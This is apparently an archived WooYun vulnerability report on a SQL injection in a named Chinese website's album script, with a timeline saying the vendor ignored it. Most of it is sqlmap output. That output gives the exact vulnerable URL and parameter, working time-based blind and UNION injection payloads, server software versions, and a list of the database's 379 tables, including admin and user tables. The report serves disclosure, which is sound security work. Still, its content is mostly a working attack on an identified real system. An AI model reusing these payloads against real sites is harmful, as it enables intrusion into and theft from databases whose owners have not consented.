乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-26: 细节已通知厂商并且等待厂商处理中 2016-03-02: 厂商已经主动忽略漏洞,细节向公众公开
http://www.roowei.com/js/Album.js.php?action=Select_album&class=0&diqu=0&limit=7
sqlmap resumed the following injection point(s) from stored session:---Parameter: class (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=Select_album&class=0) AND (SELECT * FROM (SELECT(SLEEP(5)))SVlA) AND (9229=9229&diqu=0&limit=7 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: action=Select_album&class=0) UNION ALL SELECT NULL,CONCAT(0x716b767a71,0x45666263565575454c75,0x7178716271),NULL,NULL,NULL-- &diqu=0&limit=7---web application technology: PHP 5.5.14back-end DBMS: MySQL >= 5.0.0Database: roowei[379 tables]+---------------------------------+| sl_admin || sl_admin_ads || sl_admin_ads_manage || sl_admin_ads_new || sl_admin_ads_page || sl_admin_ads_type_manage || sl_admin_article || sl_admin_articlehits || sl_admin_articlemycat || sl_admin_articlepage || sl_admin_industry_ads || sl_admin_industry_webseo || sl_admin_web_page || sl_adminfailedlogin || sl_admingroup || sl_admingroupmap || sl_adminoperlog || sl_adminsection || sl_album_user || sl_backsession || sl_cacheback || sl_cachefront || sl_cachesearchback || sl_cachesearchfront || sl_ci_sessions || sl_cn_ads || sl_cn_ads1 || sl_cn_ads_industry || sl_cn_ads_new || sl_cn_advertising || sl_cn_advertising2 || sl_cn_advertising_industry || sl_cn_advertising_new || sl_cn_album || sl_cn_article || sl_cn_article1 || sl_cn_article1_content || sl_cn_article1_count || sl_cn_article_index || sl_cn_article_index_category || sl_cn_article_index_content || sl_cn_article_index_count || sl_cn_articlecatadgrmap || sl_cn_articlecategory || sl_cn_articlecatusgrmap || sl_cn_articlecomment || sl_cn_articlecontribution || sl_cn_articlecounter || sl_cn_articlehits || sl_cn_articleimg || sl_cn_articleimg_copy || sl_cn_articlemycat || sl_cn_articlemycomment || sl_cn_articlepage || sl_cn_articlepage1 || sl_cn_classinfo || sl_cn_classinfo1 || sl_cn_classinfo_adminpush || sl_cn_classinfo_attr || sl_cn_classinfo_attr_value || sl_cn_classinfo_category || sl_cn_classinfo_comment1 || sl_cn_classinfo_content || sl_cn_classinfo_count || sl_cn_classinfo_favorite || sl_cn_classinfo_jobmap || sl_cn_classinfo_list || sl_cn_classinfo_old_data || sl_cn_classinfo_order || sl_cn_classinfo_template || sl_cn_classinfo_xphoto || sl_cn_classinfoattr || sl_cn_classinfocatadgmap || sl_cn_classinfocatattrelement || sl_cn_classinfocatgeory || sl_cn_classinfocatusgmap || sl_cn_classinfomember || sl_cn_comment || sl_cn_count || sl_cn_custom_navigate || sl_cn_domain || sl_cn_feedback || sl_cn_feedbacktadgmap || sl_cn_feedbacktusgmap || sl_cn_feedbacktype || sl_cn_friendly_link || sl_cn_gallery_album || sl_cn_gallery_picture || sl_cn_goods || sl_cn_goodscatadgrmap || sl_cn_goodscategory || sl_cn_goodscatusgrmap || sl_cn_goodscomment || sl_cn_goodsconsignee || sl_cn_goodscounter || sl_cn_goodsmycomment || sl_cn_goodsorder || sl_cn_goodsordergoods || sl_cn_hweb_hist || sl_cn_indexs || sl_cn_indexs_1 || sl_cn_indexs_copy1 || sl_cn_industrie_manage || sl_cn_industrie_nav || sl_cn_industry_admin || sl_cn_industry_ads_seat || sl_cn_industry_ads_trade || sl_cn_industry_advertise || sl_cn_industry_album || sl_cn_industry_company || sl_cn_industry_company_mycat || sl_cn_industry_picture || sl_cn_industry_recharge_record || sl_cn_industry_website || sl_cn_infor_rule || sl_cn_menu || sl_cn_message || sl_cn_module || sl_cn_module_choose || sl_cn_module_choose_custom_text || sl_cn_module_manage || sl_cn_navigate || sl_cn_navigate_mark || sl_cn_payment || sl_cn_photo || sl_cn_poll || sl_cn_polloption || sl_cn_product || sl_cn_product_content || sl_cn_product_count || sl_cn_product_index || sl_cn_product_index_category || sl_cn_product_index_content || sl_cn_product_index_count || sl_cn_quick || sl_cn_router_auth_logs || sl_cn_router_auth_page || sl_cn_router_info || sl_cn_router_user || sl_cn_site || sl_cn_sms_order || sl_cn_staticcontent || sl_cn_template || sl_cn_territory || sl_cn_tools || sl_cn_tools_count || sl_cn_tradebuyvip || sl_cn_tradecertificate || sl_cn_tradecompany || sl_cn_tradecompanyseo || sl_cn_tradecorpindmap || sl_cn_tradedomainname || sl_cn_tradefavoritejobad || sl_cn_tradefavoritejobseeker || sl_cn_tradeindadgmap || sl_cn_tradeindattrelement || sl_cn_tradeindusgmap || sl_cn_tradeindustry || sl_cn_tradeindustry_data || sl_cn_tradeinfo || sl_cn_tradeinfo2 || sl_cn_tradeinfo_content || sl_cn_tradeinfoattr || sl_cn_tradeinfotype || sl_cn_tradejobads || sl_cn_tradejobcategory || sl_cn_tradejobmap || sl_cn_tradejobseeker || sl_cn_tradelink || sl_cn_trademessage || sl_cn_trademyproduct || sl_cn_trademyproductcat || sl_cn_tradeprocontri || sl_cn_tradeproduct || sl_cn_tradeproduct_content || sl_cn_tradeproductattr || sl_cn_tradeproducthist || sl_cn_user_ads || sl_cn_user_hits || sl_cn_user_manageads || sl_cn_user_orderads || sl_cn_user_quick || sl_cn_usertools || sl_cn_video || sl_cn_videoblog || sl_cn_videocatadgrmap || sl_cn_videocategory || sl_cn_videocatusgrmap || sl_cn_videocomment || sl_cn_videocontribution || sl_cn_videocounter || sl_cn_videomycat || sl_cn_videomycomment || sl_cn_videopage || sl_cn_web || sl_cn_web_copy || sl_cn_web_hist || sl_cn_web_industry || sl_cn_webpage || sl_cn_webpageblock || sl_cn_webpagetype || sl_cn_webseo || sl_cn_weisite_adv || sl_cn_weisite_adv_content || sl_cn_weisite_adv_count_201503 || sl_cn_weisite_adv_count_201504 || sl_cn_weisite_adv_count_201507 || sl_cn_weisite_adv_count_201602 || sl_cn_weisite_adv_count_main || sl_cn_weisite_article || sl_cn_weisite_article_content || sl_cn_weisite_consum_level || sl_cn_weisite_custom_category || sl_cn_weisite_custom_column || sl_cn_weisite_custom_view || sl_cn_weisite_industry_class || sl_cn_weisite_info || sl_cn_weisite_tpl || sl_cn_wifi_auth_count || sl_cn_wifi_auth_count_201503 || sl_cn_wifi_auth_count_201504 || sl_cn_wifi_auth_count_main || sl_cn_wifi_auth_page || sl_cn_wifi_router_auth_logs || sl_cn_wifi_router_info || sl_cn_wifi_router_user || sl_cn_wifi_sms_log || sl_cn_wifi_sms_tpl || sl_cn_wifi_template || sl_cn_wifi_value_add || sl_cn_xfphoto || sl_content_page || sl_cron || sl_cuxiao || sl_defaulttemp || sl_du_bborder || sl_du_bcrelation || sl_du_border || sl_du_content || sl_du_content_1 || sl_du_layout || sl_du_module || sl_du_proportion || sl_emotion || sl_frontsession || sl_goods_ads || sl_goods_adsadmin || sl_goods_advertising || sl_goods_album || sl_goods_album_pic || sl_goods_album_pic_count || sl_goods_article || sl_goods_attribute || sl_goods_attribute_rule || sl_goods_attribute_value || sl_goods_brand || sl_goods_brand_class || sl_goods_category || sl_goods_category_class || sl_goods_category_staple || sl_goods_collection || sl_goods_custom_category || sl_goods_default_logistics || sl_goods_delivery_address || sl_goods_feedback || sl_goods_link || sl_goods_logistics || sl_goods_map || sl_goods_member_level || sl_goods_money_back || sl_goods_navadmin || sl_goods_order || sl_goods_order_pro || sl_goods_payment || sl_goods_product || sl_goods_product_attr || sl_goods_product_close || sl_goods_product_content || sl_goods_product_count || sl_goods_product_pic || sl_goods_product_spec || sl_goods_product_storage || sl_goods_ship || sl_goods_ship_address || sl_goods_shop_cart || sl_goods_spec || sl_goods_spec_value || sl_goods_store || sl_goods_storeinfo || sl_goods_stroenav || sl_goods_template_admin || sl_goods_tpladmin || sl_goods_type || sl_goods_type_brand || sl_goods_type_spec || sl_goods_uidtourl || sl_goods_video_list || sl_goods_weiquan || sl_inadmin_cuxiao || sl_industry_dress_template || sl_industry_module || sl_industry_template || sl_industry_video_list || sl_instance || sl_keyword || sl_manage_admin_details || sl_manage_admins || sl_manage_auth || sl_manage_auth_module || sl_manage_auth_rights || sl_manage_controllers || sl_manage_cpage || sl_member_dress_template || sl_member_industry || sl_member_layout || sl_member_module || sl_member_module_style || sl_member_template || sl_mess || sl_na_ads_admin || sl_na_ads_trade || sl_na_advertising || sl_na_advertising_price || sl_na_advertising_type || sl_na_member || sl_na_member_field || sl_na_role || sl_na_store_grade || sl_na_storegrade_order || sl_newscontent || sl_oauth || sl_operator || sl_operator_field || sl_operators_order || sl_page || sl_qq || sl_role || sl_role_module || sl_role_project || sl_setting || sl_site_type || sl_tml || sl_trade_ads || sl_user || sl_user_autologin || sl_user_code || sl_user_config || sl_user_error || sl_user_forgetpassword || sl_user_grade || sl_user_oem || sl_user_oemlist || sl_user_publish_count || sl_user_templates || sl_user_upgrade || sl_userextra || sl_usergroup || sl_usergroupmap || sl_usersection || sl_video || sl_video_list || sl_web_class || sl_web_r_page || sl_web_shenghuo || sl_webp_class || sl_website_setting || sl_weicode || sl_wx_autoreply || sl_wx_menu || sl_wx_owneruser || sl_wx_thesaurus || sl_wx_user || sl_yy_admin || sl_yy_module || sl_yy_modulegroup || sl_yy_role || sl_yy_usermodule || sl_yy_userrole || users |+---------------------------------+
危害等级:无影响厂商忽略
忽略时间:2016-03-02 12:20
漏洞Rank:4 (WooYun评价)
暂无
